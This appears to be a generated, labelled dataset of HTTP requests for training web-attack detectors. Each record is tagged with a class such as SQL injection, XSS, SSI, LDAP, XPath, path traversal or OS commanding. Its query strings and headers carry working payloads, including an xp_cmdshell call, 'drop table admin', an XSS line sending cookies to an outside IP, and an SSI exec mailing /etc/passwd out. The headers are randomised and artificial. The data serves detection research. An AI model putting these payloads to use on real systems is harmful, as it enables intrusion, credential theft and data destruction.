UA-CPU: 68000
UA-Disp: 996,846,16
UA-OS: Linux
UA-Color: color8
UA-Pixels: 2184x777
Via: 0.3 78.171.60.206
Transfer-Encoding: ramO
Upgrade: hiCkrp/2.9, tclcr/7.7, ntp5/3.3, her/1.8
Warning: 285 39.249.111.46 "orhrou3Uo8amdcneinui" "Sun, 02 Sep 07 09:37:14 CET"
X-Forwarded-For: 154.142.43.224
X-Serial-Number: 475557970524
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40302
Start - Id: 46407
class: PathTransversal
GET /yMT.7_.j2nEL.tiff?sepmedni1ax7r3=pserE&6rLemtwoSF=%2Fetc%2Fpasswd&rtytytsirlyeEs=eir%2BGscript&eatrsdler=ib0&lpCeuemuo0m=tu%28k HTTP/1.0
Host: 198.247.15.225:206
Connection: keep-alive
Accept: video/*;q=0.7, application/*;q=0.0
Accept-Charset: *;q=0.3
Accept-Encoding: 
Accept-Language: *;q=0.8
Cache-Control: min-fresh=19
Client-ip: 43.17.188.82
Cookie: gMrhi3ae6aks=45qaeEo;rde4jiemgi4gwC=745;qedo8tSe0icNw=umawDsnnsQhIoac;H-_zPI0gNkcJ=4860;tedrbRfae=tilibBh
Cookie2: $Version="521"
Date: Sun, 06 Apr 08 21:40:56 UTC
ETag: "5VQcAID_5zkuNV@ulhyJ"
Expect: 100-continue
From: wegeqhea@e2xmcrate.uk
If-Modified-Since: Tue, 13 Sep 05 18:01:09 UTC
If-Unmodified-Since: Thu, 25 Jun 09 09:30:55 CET
If-Match: "eEkAGWc@H9GgtREHtdi"
If-None-Match: *
If-Range: *
Max-Forwards: 9377
MIME-Version: 7.9
Pragma: no-cache
Proxy-Authorization: Digest response="2bBc1984bDE0f56e49cE74EDa6cF9C8c"
Authorization: aqaf cysTse=aauaoyn
Range: 0-,-1441,-234089
Referer: /wI2inon/ralhEfft/rreotn.swf
TE: trailers,trailers,trailers
Trailer: TE
User-Agent: Mozilla/3.5 (X11; U; SunOS sun4u 9.3; 3v-he; rv:4.7.1) Gecko/87116154
UA-CPU: x86
UA-Disp: 9745,801,16
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 525x634
Via: HTTP/7.6 www.Mneerr.png, djewea/8.6 www.eagtFE.png:4555, xot/8.2 22.64.213.159:07646
Transfer-Encoding: dtn0nz
Upgrade: 1qohtl/5.6, dsgali/4.9
Warning: 321 www.qhjnlsh.gif "tzcnI8rhloto3rnecm" 
X-Forwarded-For: 141.149.156.77
X-Serial-Number: 22445
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46407
Start - Id: 37012
class: LdapInjection
GET /rduel3Lntn8iehv.js?eiakob5r5oo96m6=5lHmemr6a21k&sruo2=hddkiNtsG&wwnptnsv=hfmalPnmgnihl&ahTgo6e=%22%29%28targetfilter%3D%28o%3DNetscapeRoot%29%29 HTTP/1.1
Host: 169.244.227.202
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.9
Accept-Encoding: *
Accept-Language: *
Cache-Control: max-stale
Client-ip: 37.233.198.38
Cookie: moal5TRebss=dratmja0o;dcr8dr2dst5=pLfp;tcniah=tcVr9UffT0;cjmwS9oqgonp=80u(iihzhdb;y4=oc
Cookie2: $Version="83"
Date: Thu, 23 Jun 05 02:26:06 UTC
ETag: "wRhCcv9Re9WpU6WH86K1"
Expect: sUyt3Hn=odaE
From: ete2k@zfNl4.de
If-Modified-Since: Sun, 20 Jan 08 11:01:09 GMT
If-Unmodified-Since: Sun, 23 May 04 07:33:29 CET
If-Match: *
If-None-Match: "7H4gI5pCf3_gBNjbksw"
If-Range: Mon, 15 Sep 08 16:13:33 CET
Max-Forwards: 73
MIME-Version: 6.2
Pragma: no-cache
Proxy-Authorization: NTLM bjhjeWN6aXRhb2VyY2VzcnBvOXloU2Y1dnJsdGhsNnRyOG5pb2N4TE4=
Authorization: Basic aFdpZm9objpzaG1ucmw=
Range: 11-,-9658
Referer: /gawsieo3.txt
TE: trailers,gzip;q=0.9
Trailer: Cache-Control
User-Agent: Mozilla/6.1 (Windows; U; WinNT 8.6; ai-hl; rv:1.7.3) Gecko/97277854
UA-CPU: StrongARM
UA-Disp: 720,086,32
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 8274x205
Via: 2.3 www.idyilm.htm, 0.0 www.cgl4d.png
Transfer-Encoding: 2ril2; eaqc=nanho
Upgrade: dho/9.5, 3oax/1.9
Warning: 992 www.dyteeg.tiff "riPlyr" 
X-Forwarded-For: 164.143.217.25
X-Serial-Number: 4092233930
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37012
Start - Id: 47331
class: XSS
GET /mggtmacj/ePuB1ibj4pEH5e1Ota_/9emibAu/ep/vrethburot.js?.V3Hn_-yRVn8=lo4uprgo9s&rgeeOvots=oBcjwV&iayO3=+n&nSylD8=%40ep&partd0ge=a3&e0eukdnxfi3=89789629&sli8hoYtuce=udh+euho%2FYhw&hgltH2Csgeoexed=esOa4r%3Cl1hSqt&lsdeletez94OX=nwWrYY1&aqIayu=1&uJi0htpass=tnO%28nrqEies%28%29Npw&.GcatWRexeciM=canYWvN&4omt=%3Cimg+src%3D%26%7B%5Bwindow.open%28%27http%3A%2F%2F217.82.118.204%2Ftige.nsf%27%2Bdocument.cookie%29%3B%5D%7D%3B++++%3E&ekoln9rcwo1=oirlink5h&access_logl7OOsamJ=1411449898 HTTP/1.0
Host: www.snlhg2.be:80
Connection: close
Accept: */*;q=0.0
Accept-Charset: *
Accept-Encoding: *;q=0.0
Accept-Language: *;q=0.8
Cache-Control: max-age=32115
Client-ip: 79.146.0.234
Cookie: w1gt7itt=oirb;bsenao=c33UX;naylb=tRaudd'aenh
Cookie2: $Version="6"
Date: Sat, 07 Feb 09 04:05:23 GMT
ETag: "z6o_GAUk0@qlTgH0GaT."
Expect: 100-continue
From: iipt@ooal.biz
If-Modified-Since: Sun, 07 Jan 07 05:35:51 GMT
If-Unmodified-Since: Fri, 12 Feb 10 14:21:08 GMT
If-Match: "OKBJ3kkDpGcd0FL"
If-None-Match: *
If-Range: Fri, 30 Oct 09 23:30:43 UTC
Max-Forwards: 1125
MIME-Version: 0.7
Pragma: no-cache
Proxy-Authorization: Digest cnonce="izenb6"
Authorization: NTLM aWU4aWFpcHQ0b2c5UjZIaXNpdG5iM3dzMmVyZXBjc2VQcg==
Range: -827060,69-,229-399617
Referer: http://spisg7l.cz/odr2B/eiIe/hgdb/isDnh.asp
TE: trailers,deflate,trailers
Trailer: If-Match
User-Agent: Mozilla/7.7 (X11; U; Linux i586 6.9; 5f-cd; rv:5.1.5) Gecko/20188895
UA-CPU: 68000
UA-Disp: 699,6656,8
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 6004x311
Via: 3.3 127.88.135.65, zo1c/0.5 207.196.196.203
Transfer-Encoding: compress
Upgrade: eoea/3.2, whp5n/5.7, nto/1.7, nsa/0.9
Warning: 318 www.lawraii.gif:81 "spet7rfthtnscentm3" "Thu, 05 Aug 04 21:32:03 CET"
X-Forwarded-For: 216.123.220.178
X-Serial-Number: 9556709802394
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47331
Start - Id: 41147
class: SqlInjection
GET /tiTnxtiiVHdA9/ter3jpm/qcopyJ2z43eRAmo/tO6Cd6ooJyoUfGE/execimgXm/srmtfa/W22phpMW/u4Zl/taczTVtXXjuD-/tCbq/autoexecEc5sock_streamm9/piepsaenotOs4lma.css?qudatgaberyotT=cqId_&esatne4Aa=%27%3BEXECmaster.dbo.xp_cmdshell%27cmd.exe&3xp_XPCR-ZGsock_stream=open&utrti=ign45cN6rer HTTP/1.0
Host: www.uyttnBa.ch
Connection: close
Accept: */*;q=0.7
Accept-Charset: *;q=0.6
Accept-Encoding: 
Accept-Language: *
Cache-Control: rn=8
Client-ip: 59.117.147.78
Cookie: 316t.TIQEg=hap
Cookie2: $Version="645"
Date: Sat, 05 Jan 08 20:07:50 UTC
ETag: "3gWmZjep6Aga7L5S"
Expect: 100-continue
From: txaWstrh@gamw.fr
If-Modified-Since: Sun, 19 Feb 06 18:22:32 GMT
If-Unmodified-Since: Mon, 17 Sep 07 16:17:01 GMT
If-Match: *
If-None-Match: *
If-Range: "8zPXoHeB9Z8VOyxO"
Max-Forwards: 191
MIME-Version: 7.8
Pragma: no-cache
Proxy-Authorization: Digest algorithm=nnLn
Authorization: hsyo a1athee=oysetv
Range: 70-3
Referer: /ehtscah/sctr/owTne/tntseeto/Rxet.swf
TE: trailers
Trailer: Date
User-Agent: Mozilla/0.6 (X11; U; Open BSD i386 1.0; yn-i9; rv:1.0.2) Gecko/75599171
UA-CPU: Sparc
UA-Disp: 952,1268,32
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 6392x3282
Via: seu/2.2 77.65.209.13, 1.2 www.owTmce.gif
Transfer-Encoding: compress
Upgrade: ng6s/4.8, 4et/8.2
Warning: 458 www.anke2uT.gif "btsiteht9hIieeLwah" 
X-Forwarded-For: 169.105.19.193
X-Serial-Number: 566074493
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41147
Start - Id: 39875
class: SSI
GET /ceuwat4aaoahphmi1/i4apNaDg6ixat4_sNIA/rwx2/DGHUPD/4nmneac6dulrrtxodna/y97ZFpqbkKfMQEGxpgI.html?tqPnzfincXx=273139&csqeopixl52mMer=TEdexeclMouaew&vppndfei=tieaiedhu+s0&41q7zjre=%3DysAt&TisaIcATst=iegt&klperlfnwh=shNGslDLd&jbdIo=532361&Lv=93895&slihowzi4gx=insertRen+&wuqwisqheg7neh=gexeccat&drr=ablHxeoGqV&eZreplace5.GI9XtCd=5ec+e0lfromdeletect1+ncyHrimetao&dr2mi=neoz9osn+o&nr4dn4heelag=124&a8tfa2ingdUsow=74 HTTP/1.0
Host: 227.154.176.207
Connection: close
Accept: */*;q=0.1
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-age=7406
Date: Sat, 18 Oct 08 24:13:23 CET
Expect: 100-continue
If-Unmodified-Since: Fri, 07 Sep 07 21:34:31 GMT
If-Match: *
If-None-Match: *
If-Range: Sun, 20 Nov 05 23:03:51 GMT
Max-Forwards: 324
MIME-Version: 1.0
Authorization: snkc Mgtgdo=olmd
Referer: http://www.yravumh5.be/emmda/4udisu/eea5qla/oR6Xdhw1/Ieuew4.jpg
User-Agent: <!-- #exec    cmd="/bin/mail     i2obfuttl.com < /etc/passwd"-->
UA-Color: color16
Via: FTP/8.3 132.126.190.159, 4.9 www.pehari.png, FTP/3.1 34.165.162.142
Upgrade: ehegr/0.3

null

End - Id: 39875
Start - Id: 42608
class: SqlInjection
GET /6-b6NtQ-M7St1DhHM/1nutboataNTgabaltIt4/aiu/eirNtcis28/EaYsneoic47/HO78PJxRFN7m7@./veE7otsWr/nIblwHwWlioN0.tiff?eiesimue59dc=%261+uttbdtjwo%29i&lsyuan=rxaJedKepH&m0sjetoo7pw=11958&8evvTec=1&NwceC3niodftam=91Eebi5h&imgandwgetspAmetab=50817455&ase01ee5h=55188239&QganKdhaiwa=%3C0a%5Cssdirsstdin&axt5=611932&tshnmsv=%3B+++++EXEC%28+++%27INS%27%2B%27ERT++INTO+users+++values%2872%2C%27ghettyy%27%2C%27arm3%27%29%29 HTTP/1.0
Host: 157.199.126.5:1
Connection: close
Accept: audio/x-wav;q=0.7
Accept-Charset: *
Accept-Encoding: *
Accept-Language: l0l0-neetwg7;q=0.7, tssagy-pioruhap;q=0.2, vnreri-ggrT0;q=0.2
Cache-Control: max-age=8
Client-ip: 133.203.70.198
Cookie: ayqi0m=a3~ d;1qrn=rvZarj3vkgG
Cookie2: $Version="641"
Date: Fri, 23 May 08 17:07:00 CET
ETag: W/"dDx574vQD5EHg8r83RQ"
Expect: r9g3sbl=nvita
From: Ttm5ttN@Sin1.net
If-Modified-Since: Tue, 23 Mar 04 21:40:43 UTC
If-Unmodified-Since: Sat, 20 Oct 07 17:09:50 GMT
If-Match: *
If-None-Match: *
If-Range: Wed, 09 Jun 04 03:46:25 UTC
Max-Forwards: 158
MIME-Version: 0.0
Pragma: no-cache
Proxy-Authorization: Digest algorithm=MD5-sess
Authorization: kIy2iv dgso3rtl=ecuz
Referer: /erra.jpeg
TE: gzip;q=0.0,trailers,trailers
Trailer: Warning
User-Agent: xlfoas (ka3gCChTzv; tRKlTjtCP; geTu3psZ; loexvD2Y; nXKi0Txyl)
UA-CPU: PowerPC
UA-Disp: 4133,8176,16
UA-OS: Win95
UA-Pixels: 4720x346
Via: 6.9 www.u3liee.gif, 4.1 www.y9nshn3A.jpg
Transfer-Encoding: compress
Upgrade: utiuG/5.0
Warning: 966 www.behrc.jpeg "tmzezat" "Sat, 08 Apr 06 03:40:35 CET"
X-Forwarded-For: 32.163.55.249
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42608
Start - Id: 49472
class: XPathInjection
GET /6g7/enhB6ldepetf/v34fAiFSP.S/CWlJVl9Vcv/5ntti/nThntuTotuw7/w96gx8P/cao.htm?rt9shiiheq=8858954&e4tvmzstui=750&nch0eT1g=NfL7ldhtpassw7T&ysn3aiawaaaE=rrmni&ohto5uEevi=i2sPaqn&vfdamg=+passwd0aq&4Hw=kQ77vR_Eo&mrunnlcs=0u6C%40.tsf&zmJGzYq=ur%27++++or+++auDctn%2Fi%2Fchild%3A%3Anode%28%29%5Bprocessing-instruction%28%29%3D9%5D+or++%27z5nTdo%27++%3D+++%27 HTTP/1.0
Host: 112.113.182.160
Connection: suci2ba
Accept: image/*;q=0.0, text/*;q=0.8
Accept-Charset: *
Accept-Encoding: 
Accept-Language: U-Etegra1, wo9eeQm-hei3iZ;q=0.1, abtiaYhi-1n, iidef-0gh;q=0.1, esa7a-a
Cache-Control: max-age=27
Client-ip: 176.14.182.206
Cookie: rtoontte=l0d1reti3vomeuarr;dOe=qWC;rt=bhtpass=efnri
Cookie2: $Version="4"
Date: Tue, 24 Feb 09 07:28:45 CET
ETag: W/"8WDs@-d9IdX423MDOwo"
Expect: 100-continue
From: 8tns@scEoyunm.org
If-Modified-Since: Tue, 25 May 04 19:26:20 GMT
If-Unmodified-Since: Sat, 22 Aug 09 13:41:27 CET
If-Match: *
If-None-Match: "6Xx3uW0oqohpEDCg6"
If-Range: "L2_eRyjXKIW6hbHqV5"
Max-Forwards: 541
MIME-Version: 2.1
Pragma: e=uet
Proxy-Authorization: so9ts otea6n=hdva
Authorization: Digest nonce
Range: -012
Referer: /i9xba/otijeatw/red740e/utlaf/6edc9.bin
TE: trailers,gzip;q=0.2
Trailer: Cache-Control
User-Agent: Mozilla/8.1 (Machintosh; U; PPC Mac OS X 4.0; bN-gt; rv:5.2.9) Gecko/45259032
UA-CPU: PowerPC
UA-Disp: 198,205,16
UA-OS: Win98
UA-Color: color8
UA-Pixels: 527x1451
Via: 7.8 www.snxjsone.shtml, FTP/4.9 www.en7ieCVe.html, 3.3 206.21.178.194
Transfer-Encoding: compress
Upgrade: eeDgae/2.2, 0s9z/5.7, lsea/9.9, rro/8.2
Warning: 811 www.h0iseed.jpg "Eayaooe2bzy9a" "Fri, 24 Nov 06 06:59:07 UTC"
X-Forwarded-For: 64.1.22.247
X-Serial-Number: 008046
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49472
Start - Id: 39715
class: SSI
GET /50-_vEgvN623jddD5/re1otgd7Ifiwtj/.jXQE8ApbeC.5DQ.pl?um8Q4NC=%3C%21--+%23include+++++virtual%3D%22%2Fvar%2Flog%2Fhttpd%2Faccess.log%22+--%3E HTTP/1.0
Host: www.iks1bda.ch:18773
Connection: close
Accept: text/*
Accept-Charset: utf-8
Accept-Encoding: 
Accept-Language: EMcsens-eryaaofy;q=0.0, giies-osdovpr;q=0.6, io-rcro;q=0.6, artpo2i9-nyt8arPS;q=0.2
Cache-Control: no-transform
Client-ip: 215.74.168.109
Cookie: d0krgrd1steskn=oN<stte hcdon;1Lnts8g=siaRi
Cookie2: $Version="372"
Date: Sat, 07 Nov 09 02:37:37 CET
ETag: "S3drG_PYWSBZhlFGgd0W"
Expect: 100-continue
From: iltkt32@r7Muj.it
If-Modified-Since: Sun, 04 Jun 06 03:51:17 GMT
If-Unmodified-Since: Thu, 16 Nov 06 06:34:59 UTC
If-Match: *
If-None-Match: "sxPKoV3rJ.qan7-7SX45"
If-Range: Sun, 29 Jan 06 07:21:27 GMT
Max-Forwards: 2811
MIME-Version: 4.8
Pragma: hlh=roo2gtah
Proxy-Authorization: Digest cnonce="d8sec"
Authorization: Basic cm5kcnM6Ymw1Y29y
Range: 61-,98874-5,222224-
Referer: /hide/zOaKme/oarso.gz
TE: deflate,trailers
Trailer: If-None-Match
User-Agent: Mozilla/7.6 (compatible; rhynhe; Linux i386; aaipsOTcwi; 2tgsas; tM1rsgsnE)
UA-CPU: x86
UA-Disp: 3264,053,16
UA-OS: Win98
UA-Color: color8
UA-Pixels: 066x3039
Via: 6.3 88.31.214.235, ioa0/4.5 118.63.12.224
Transfer-Encoding: eeay; e5zjrlea=rueea
Upgrade: effn/5.2, ajnt/0.1
Warning: 414 39.123.241.242 "diuAtlysh" "Sat, 05 May 07 01:06:17 GMT"
X-Forwarded-For: 227.157.179.153
X-Serial-Number: 9911764547155
----: ------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 39715
Start - Id: 40729
class: SSI
GET /weole2avSh/yZ@OW-d8@nreOl_/VKy1tPx/inugho22st/cD3neEJuB6p/aq3mm.vpTF.css?fsoedeAe=tmhXFta_n&ptwlirqoaTncses=bspiscsex7Dx&mitmudjhrs=rntmeodp&ex1w=235Wocctezii4m&Fuvnihwr2w=t2hmxoaootmfle&9otncSnl=219669&0mel=dTzExqrotFM&drcagnl=5506230441&o3opdNslh4=9e8&mefipb7qat=hlntwee7%24AtuArr&salyoAugH=%3BhisR&.2yr0zusrQ8=680588&no96alyeaxf=sWmq9 HTTP/1.1
Host: www.b1edqt6.net
Connection: close
Accept: */*
Accept-Charset: x-mac-roman;q=0.1, shift_jis, windows-1254;q=0.1, x-mac-roman;q=0.9, iso-8859-7
Accept-Encoding: <!-- #odbc statement  ="select  7ron,     Cucba,     nResrgsp    from     oeamH     order  by  2,   62,   1"   -->
Accept-Language: *
Cache-Control: max-age=9
Cookie: kIt5su=i@;nnHqOwenAl=stdin;qc3lbrgcroW=q@m
Date: Tue, 31 May 05 08:57:50 GMT
Expect: slla=8Sstmype;itidhoa
If-Match: *
If-Range: "ka9lst6XsWODW4IhFJT"
Max-Forwards: 0
Pragma: no-cache
Proxy-Authorization: Digest qop=epWbboe
Referer: /8nRs/htto.pl
TE: chunked,chunked;q=0.0,trailers
User-Agent: Mozilla/3.0 (X11; U; SunOS sun4u 2.6; d6-li; rv:0.2.3) Gecko/13325938
Transfer-Encoding: gzip
X-Forwarded-For: 168.72.228.20

null

End - Id: 40729
Start - Id: 36249
class: PathTransversal
GET /t5Fnt.ZTG2/TUHX4YdsRMdropnnb.tiff?17esse8aab=%28&hnlohq6qwdoeTm=aixee&aaorr85ihg=hs&TTINbcgz=NrshmbG%26un+ase HTTP/1.0
Host: 114.224.249.200
Connection: wTivt
Accept: */*;q=0.0
Accept-Charset: x-mac-korean, windows-1257;q=0.6
Accept-Encoding: 
Accept-Language: *;q=0.8
Client-ip: 215.4.236.249
Cookie: ueaeneo9=r e$xtermrw;lmth1=/etc/passwd
Date: Thu, 16 Apr 09 22:43:32 CET
Expect: 100-continue
If-Modified-Since: Mon, 16 Jul 07 02:11:45 CET
If-Unmodified-Since: Sat, 30 Dec 06 16:20:03 GMT
If-Match: *
If-None-Match: "ZorvBLKojpaUAjtsV"
If-Range: *
Max-Forwards: 413
MIME-Version: 4.1
Authorization: Digest nonce
Range: 6130-
Referer: http://www.Tud6c.fr/ooiohdn/oeea/omtyeha/krfktlo.png
Trailer: Upgrade
User-Agent: qaRrG_iCd http://www.oei5trof.uk
UA-Disp: 2093,5749,8
UA-OS: Win95
UA-Color: color16
Via: 4.0 www.angis4.jpeg
Transfer-Encoding: compress
Upgrade: bua/6.7, htODm/6.2, r2gsl/7.0
Warning: 096 157.123.66.186 "ueaameneaEgnHA3e" "Mon, 26 Apr 10 14:29:26 GMT"
----: ------------------

null

End - Id: 36249
Start - Id: 39616
class: SSI
GET /cqq/goersesirHNoali2/cq/jos2rbm/tdZQW8yI_h.1/aaej4stqas/bm2oIs4nathtprdp/P@Ezb..js?rep=EheFhctebtoI&Xa0iUDPzVLmochaM=utclspd9voA%24hnrtP&7bsv=5EPidtOihttpin%3E0a6+%28+I%3Fy&riistnghnk=rieSn&ietnir=oxxAAdv3GQg&jibihH=llti&c09=a1VyJ49xbp7G&qao2clergseoec=vtdro%28sesq+tnsiitt&7XMchildadmin=%3C%21--%23include+++virtual%3D%22%2Fetc%2Fpasswd%22+++--%3E HTTP/1.0
Host: www.b1amic0.cz
Connection: close
Accept: */*;q=0.5
Accept-Charset: *
Accept-Encoding: identity, identity, gzip;q=0.8, gzip;q=0.4
Accept-Language: *
Cache-Control: Irtxs='sheNqf'
Client-ip: 79.170.36.207
Cookie: tcr=m0stgottok;nOoatezhuhM=51692
Cookie2: $Version="143"
Date: Fri, 10 Aug 07 14:16:34 UTC
ETag: W/"nXLxjQhgJIFjcXESD"
Expect: 100-continue
From: ts3vhh@kqzfn.com
If-Modified-Since: Thu, 26 Mar 09 04:29:11 UTC
If-Unmodified-Since: Fri, 18 May 07 20:11:32 UTC
If-Match: *
If-None-Match: *
If-Range: Fri, 26 Mar 10 20:07:23 UTC
Max-Forwards: 333
MIME-Version: 1.7
Pragma: ld=rius
Proxy-Authorization: Basic ZnJEb3UxOmFiQWVlMA==
Authorization: Digest qop=uncT
Range: 973-,-4,32221-
Referer: http://o4eeoo.net/bfooE/xhkceE/nrSeF/pnti8.jpg
TE: gzip;q=0.5
Trailer: Accept-Language
User-Agent: dsae0/5.4.0.4
UA-CPU: PowerPC
UA-Disp: 0993,069,16
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 1841x260
Via: 5.4 174.113.236.131
Transfer-Encoding: compress
Upgrade: i4uts/0.2, aesNA/6.1
Warning: 025 www.keet.tiff "mDUtinismbsS" "Thu, 13 May 04 10:01:27 GMT"
X-Forwarded-For: 216.187.237.43
X-Serial-Number: 224017819
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39616
Start - Id: 47920
class: XSS
GET /hiSiiatoTtiferean/n.joT0Y3_kKAUwg/nkydhpwm5.mdb?t5tthg8oma=%3Cform%2Bname%3Dtsoa+%3E%3Cselect%2Bname%3Dmtlafo++++%3Ehttp%3A%2F%2Fwww.Et6bis.com%2FlTdIe%2F%3F%3C%2Fselect%3E%3C%2Fform%3E&uMr1Zu9QOwM=tzieval&eeo=fioWqj&sagn=%3DaeR&ioernlhbensqcde=ecnvtrcopySfherhi HTTP/1.0
Host: 173.243.195.98
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.1
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-store
Client-ip: 249.54.30.10
Cookie: herepy0piA=gHltUrtamnaite;earestbostnnx=a@ flyea81ss2am;XxBh0Coxterm=4230940
Cookie2: $Version="20"
Date: Thu, 25 Aug 05 17:20:59 CET
ETag: W/"_.0C6nefcSBlQWvp"
Expect: miJlaez
From: ayedann@u5os6hn.st
If-Modified-Since: Sun, 05 Jul 09 11:33:25 GMT
If-Unmodified-Since: Sat, 09 Jan 10 08:14:47 GMT
If-Match: *
If-None-Match: "T9g_wsGtHyAHRhRw@z"
If-Range: *
Max-Forwards: 4
MIME-Version: 8.8
Pragma: no-cache
Proxy-Authorization: acdd pntas=drlmae
Authorization: NTLM bk9vd2FvbHN0ZXNlMHlvZmFlaDJUZWVhaXhyOW5uYWhoVGkxeWVuTnRnb3Rv
Range: 16-10857
Referer: /l78ni8/h5naq.fgf
TE: gzip,deflate;q=0.2,trailers
Trailer: Via
User-Agent: Mozilla/8.0 (Machintosh; U; Mac OS X 7.4; eo-1m; rv:3.1.0) Gecko/25126433
UA-CPU: Sparc
UA-Disp: 216,2039,8
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 229x467
Via: 2.7 223.182.232.86, 4.8 www.2u4r0t.jpg, HTTP/7.7 61.176.186.103
Transfer-Encoding: compress
Upgrade: anee5/8.2, scSotq/7.5, 3th/0.1, krezts/1.0
Warning: 832 www.gaeRu.html "xsaazKzls" 
X-Forwarded-For: 90.98.250.32
X-Serial-Number: 03181480810
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47920
Start - Id: 35172
class: SqlInjection
GET /TjdeshlnIPr2h/uaS2p1Yp7INjYDWdHTcR/tqjWNloDOl_oU/zU/nVZLSdm6iAPDV/sleeeyeecavmI/o2c4fIT4dD78L/86R3IwiXVWz/aJaXOSlikeEO6J.html?0ba3bibRhzed=cui7bCyzJ0ve&0OhGIH=3853169&flddemc=118&oroeobnrC=j.MtWnhsLo&ViHIFU3=rlarNex%2Bconnectti0%29&4efrnwenth=232501&rogstdknnsbehsh=%27%3B+++++drop++table+++++admin&dC7db00drm=709 HTTP/1.0
Host: 98.92.4.222:13832
Connection: srratI9i
Accept: application/x-tar;q=0.1, application/rtf;q=0.4, video/*;q=0.2
Accept-Charset: iso-8859-4, isiri-3342;q=0.4
Accept-Encoding: 
Accept-Language: tcrhenju-se, ITm-qAdnski;q=0.7, hN-o;q=0.4
Cache-Control: no-transform
Client-ip: 86.6.34.68
Cookie: bhatTchgtrryedM=ax4eqesr9Rw;Km6KoQJ=esLilyDect;eTkm72hrs=82118
Cookie2: $Version="07"
Date: Sun, 26 Sep 04 04:34:01 GMT
ETag: W/"Nd0RHovDptIfp4J8.R"
From: as5oeh@nl7ehee.ch
If-Modified-Since: Thu, 22 Jul 04 16:44:03 CET
If-Unmodified-Since: Wed, 08 Nov 06 09:36:44 UTC
If-Match: *
If-None-Match: "idJyU-TtkiuSmVzitD"
If-Range: *
Max-Forwards: 974
MIME-Version: 2.3
Proxy-Authorization: NTLM bWM1dG80b0x0MjBzYWFzaXVmZXRzczlyM211NG5yaHR2YjNtbW5zY25sZTlsNWZv
Authorization: ygitr fiyucfot=Ceeh7ale
Range: -619874,-90
Referer: /UeeeaUpl/lieetye/mvtshy/Oqatru3g/HiyL.shtml
TE: chunked;q=0.2,trailers
User-Agent: Mozilla/2.8 (X11; U; Linux i386 2.7; cs-ys; rv:9.1.8) Gecko/95743214
UA-Disp: 1579,9873,8
Via: FTP/4.5 www.eaee9eNc.png, 1.4 101.62.77.40
Transfer-Encoding: ndteU
Warning: 749 www.DeYsfD6.gif:90 "Albacnauthecopstseao" "Mon, 14 Feb 05 18:04:54 CET"
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35172
Start - Id: 36667
class: OsCommanding
GET /vnEecseOhl8el6n2e/lDe62EQhrqxX/svqchiz/ins1ahih1nloIY/telnetGb-ZI7-jtUxy1A/th7SWp.jsp?dosae=odpCyV&audlendst=%3D0Bobgsoundw%27ilo&uimznA=4nff7hthtaccesfedua&H0aJZvJh9gr=ohdutboot.ini&4r2feAba=%7C+++dir+++++..%5C%5C..%5C%5C..%5C%5C..%5C%5C..%5C%5C..%5C%5C..%5C%5C+%2C&Ot_dix.=senq%3Ere%3Ean%7E+%5Cmpassthruzimg0%2F&picR=uD%26se&eehy=77624&snsmtbgetweetun=260097321&php4b_w=aaetaijaccept&fifubohsHOootk=3883727&ncydsOl=%5DE&exld8rmoioel=2830131323&dsodGeopaee=tOhximg&Co0nr3ii=ttfj%40tekkpj HTTP/1.0
Host: www.teeo82f.uk:9453
Connection: close
Accept: application/*;q=0.2, application/*;q=0.6, application/x-tar
Accept-Charset: *
Accept-Encoding: *;q=0.7
Accept-Language: *
Client-ip: 151.58.100.177
Date: Wed, 03 May 06 01:16:44 GMT
If-Unmodified-Since: Wed, 03 May 06 16:40:04 GMT
If-Range: "gdnj4C21A_oTrKOYn"
Referer: http://www.c2sajpb.st/tine.pdf
TE: chunked,trailers,chunked;q=0.0
Trailer: Proxy-Authorization
User-Agent: Mozilla/4.9 (Machintosh; U; PPC 5.8; bi-6s; rv:2.6.2) Gecko/86460823

null

End - Id: 36667
Start - Id: 38054
class: LdapInjection
GET /Vxpjw0c2Tand/deeaQie/Ktmp28.css?Asbodyl7fE3=ehZZBi9&sIe=s8ht%29%28%26%28objectClass+%3D++++Ni*%29&pd=+ii%7E%3Cu2likew+elgnusrdftpf&zApNwMebr=fhDqu6&tArlhn=7790&FkYwhere_mochaPIfdd=s4o&o0mq4lmochaXr1s=4029056&aeopvshI4l=24443 HTTP/1.1
Host: www.4naGhwzj.st
Connection: close
Accept: */*;q=0.8
Accept-Charset: us-ascii;q=0.8, iso-8859-8, x-mac-chinesesimp;q=0.2
Accept-Encoding: 
Accept-Language: *;q=0.9
Cache-Control: max-stale
Client-ip: 26.50.164.170
Cookie: ci3SNkutH2Kvse=rstprocessing-instructionA1F=echoa;f4eest=t:D(u8l ohu;ess=d0a7hpi8n
Cookie2: $Version="54"
Date: Sun, 30 Aug 09 22:55:15 GMT
ETag: W/"7OMkJg-zuUlWnefz"
Expect: oTo0xsi=menaree;nEnewski
